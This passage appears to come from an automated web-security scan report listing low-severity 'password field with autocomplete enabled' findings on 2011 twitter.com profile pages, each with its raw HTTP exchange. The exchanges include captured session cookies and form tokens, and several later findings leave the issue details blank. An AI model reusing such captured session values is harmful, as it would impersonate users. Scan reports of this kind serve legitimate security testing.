The form contains the following password field with autocomplete enabled: <input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>

Request

GET /Siobhan_Magnus HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:43 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266023-80188-44224
ETag: "ccd41e2f423be9ffd34f56366edc99cd"
Last-Modified: Sat, 29 Jan 2011 01:53:43 GMT
X-Runtime: 0.00959
Content-Type: text/html; charset=utf-8
Content-Length: 49563
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="175bd6aba2ae90500418892622bb8793d9050022" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.70. http://twitter.com/SlexAxton

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /SlexAxton

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: <input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>

Request

GET /SlexAxton HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:45 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225045-59196-5393
ETag: "507dff22fcced375038cdd9631235460"
Last-Modified: Fri, 28 Jan 2011 14:30:45 GMT
X-Runtime: 0.00969
Content-Type: text/html; charset=utf-8
Content-Length: 49927
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="d09acd113b9e29baa5b960bb42c943b5af0bb959" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.71. http://twitter.com/StarWrit

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /StarWrit

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: <input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>

Request

GET /StarWrit HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265998-47037-26209
ETag: "98f418b00049e64d718057714c24d78d"
Last-Modified: Sat, 29 Jan 2011 01:53:18 GMT
X-Runtime: 0.01212
Content-Type: text/html; charset=utf-8
Content-Length: 69129
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="175bd6aba2ae90500418892622bb8793d9050022" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.72. http://twitter.com/Support

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /Support

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: <input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>

Request

GET /Support HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225040-79439-58935
ETag: "6f3f0f6d45a5a9149a4d122ad96ea840"
Last-Modified: Fri, 28 Jan 2011 14:30:40 GMT
X-Runtime: 0.01685
Content-Type: text/html; charset=utf-8
Content-Length: 51752
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="b4ce4942778d8bea6d0ba0bca27bb38323cfceee" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.73. http://twitter.com/Svantasukhai

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /Svantasukhai

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /Svantasukhai HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:00 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225060-92538-25020
ETag: "b5b7378e54ede43eec0f6508eb5d2185"
Last-Modified: Fri, 28 Jan 2011 14:31:00 GMT
X-Runtime: 0.00759
Content-Type: text/html; charset=utf-8
Content-Length: 29522
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="ddbcaa1f572ede8df9647a065dcd4034227cc99a" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.74. http://twitter.com/THE_REAL_SHAQ

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /THE_REAL_SHAQ

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /THE_REAL_SHAQ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:44:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265476-22093-12798
ETag: "2292bad8ff862731407148084ee7d5a9"
Last-Modified: Sat, 29 Jan 2011 01:44:36 GMT
X-Runtime: 0.00794
Content-Type: text/html; charset=utf-8
Content-Length: 49010
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="0dc3619f24c4e5e11cfa67fdde289a16ad1b1ef2" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.75. http://twitter.com/TV38Boston

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /TV38Boston

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /TV38Boston HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:55 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266035-61347-31781
ETag: "44a74d1afcf9bd83d65e21c61083ec35"
Last-Modified: Sat, 29 Jan 2011 01:53:55 GMT
X-Runtime: 0.01014
Content-Type: text/html; charset=utf-8
Content-Length: 19747
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="175bd6aba2ae90500418892622bb8793d9050022" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.76. http://twitter.com/TechCrunch

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /TechCrunch

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /TechCrunch HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225040-62897-59906
ETag: "d9c3c5e13ec1f2f0ecf37be4ab550c0a"
Last-Modified: Fri, 28 Jan 2011 14:30:40 GMT
X-Runtime: 0.00806
Content-Type: text/html; charset=utf-8
Content-Length: 54066
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="13f473a6424926f2ecffd5e2aae05a75e820f40f" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.77. http://twitter.com/TheKateBosworth

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /TheKateBosworth

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /TheKateBosworth HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:50:33 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265833-80143-41969
ETag: "2e949d88eb257784b5bf1e7f6b09ebc5"
Last-Modified: Sat, 29 Jan 2011 01:50:33 GMT
X-Runtime: 0.01545
Content-Type: text/html; charset=utf-8
Content-Length: 27140
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="2a9e161ad59285a67ba3a4b9c0b6e031009a9b9c" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.78. http://twitter.com/Trackgals

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /Trackgals

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /Trackgals HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
